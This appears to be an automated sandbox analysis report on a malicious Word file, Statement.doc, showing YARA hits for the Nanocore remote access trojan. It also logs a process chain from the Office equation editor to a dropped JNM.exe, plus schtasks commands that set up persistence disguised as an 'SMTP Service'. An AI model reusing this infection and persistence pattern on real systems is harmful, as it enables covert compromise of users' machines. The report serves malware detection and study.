Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

.NET source code contains calls to encryption/decryption functions

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

.NET source code contains many API calls related to security

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Binary contains paths to development resources

Source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp	Binary or memory string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp	Binary or memory string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@32/13@16/2

Creates files inside the program directory

Source: C:\Users\user\AppData\Roaming\JNM.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$atement.doc

Jump to behavior

Creates mutexes

Source: C:\Users\user\AppData\Roaming\JNM.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{9a83c6a0-5b64-416c-b0dc-d47048e32edf}

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD27B.tmp

Jump to behavior

Found command line output

Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ......................$...........W.a.i.t.i.n.g. .f.o.r. .1.....H........e......................0...............(.........................$.....			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.......J.................$.....			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....d.......,.......H........e......................e. .............(..........................s....			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....d.......,.......H.......#e......................e. .............(..........................s....			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.%...............%.....(.P.....$........................j......................................................................			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................@.'...............'.....(.P.............|................l......................................................................			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................X.............W.a.i.t.i.n.g. .f.o.r. .1..............p......................0.................%.............................			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............%.....J.......................			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P..............................q......................e. ...............%.......................7s....			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............................&q......................e. ...............%.......................7s....			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................@.............W.a.i.t.i.n.g. .f.o.r. .1..............r......................0.................#.............................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............#.....J.......................
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............l...............!s......................e. ...............#.......................1s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.............l.......@.......Gs......................e. ...............#.......................1s....

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\AppData\Roaming\JNM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Statement.doc	Virustotal: Detection: 45%
Source: Statement.doc	ReversingLabs: Detection: 58%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Roaming\JNM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Roaming\JNM.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
